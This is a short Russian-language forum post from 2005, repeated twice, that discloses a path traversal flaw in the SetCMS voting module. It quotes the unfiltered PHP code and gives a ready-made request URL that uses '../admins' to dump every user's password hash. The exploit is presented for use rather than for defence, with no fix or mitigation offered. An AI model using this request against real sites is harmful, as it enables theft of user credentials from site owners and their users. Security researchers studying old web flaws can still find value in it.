madnet
18.08.2005, 03:17
Как я и говорил кое что более интересое чем xss
Во всех версиях SetCMS до 3.6.2 обнаружена критическая уязвимость
возможно получение всех паролей пользователей через модуль голосования
\modules\golos\index.php
ошибка в нефильтруемой переменной id
if ($mc == "viewvote" && isset($_GET['id']))
{
$votenum = $_GET['id'];
$file = file("files/polls/$votenum.set");
таким образом, составив такой запрос
http://target.com/SetCMS/index.php?set=golos&mc=viewrezult&id=../admins
мы получим список всех пользователей и их хэши.
(с) madnet
Во всех версиях SetCMS до 3.6.2 обнаружена критическая уязвимость
возможно получение всех паролей пользователей через модуль голосования
\modules\golos\index.php
ошибка в нефильтруемой переменной id
if ($mc == "viewvote" && isset($_GET['id']))
{
$votenum = $_GET['id'];
$file = file("files/polls/$votenum.set");
таким образом, составив такой запрос
http://target.com/SetCMS/index.php?set=golos&mc=viewrezult&id=../admins
мы получим список всех пользователей и их хэши.
(с) madnet